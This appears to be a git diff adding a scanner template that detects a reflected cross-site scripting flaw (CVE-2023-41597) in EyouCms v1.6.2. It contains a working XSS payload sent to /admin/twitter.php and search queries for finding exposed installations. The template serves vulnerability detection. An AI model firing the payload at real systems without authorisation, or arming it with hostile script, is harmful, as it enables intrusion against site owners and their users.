diff --git a/http/cves/2023/CVE-2023-41597.yaml b/http/cves/2023/CVE-2023-41597.yaml new file mode 100644 index 0000000000..e24b39d571 --- /dev/null +++ b/http/cves/2023/CVE-2023-41597.yaml @@ -0,0 +1,68 @@ +id: CVE-2023-41597 + +info: + name: EyouCms v1.6.2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t. + impact: | + Allows attackers to execute malicious scripts in the context of a victim's browser session. + remediation: | + Implement proper input validation and output encoding to prevent XSS attacks. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-41597 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: eyoucms + product: eyoucms + fofa-query: + - icon_hash="-614262549" + - title="eyoucms" + tags: cve,cve2023,eyoucms,xss + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: word + part: body + words: + - 'eyoucms' + - 'ey_fleshVerify' + condition: or + internal: true + case-insensitive: true + + - method: GET + path: + - "{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: content_type + words: + - text/html + + - type: status + status: + - 200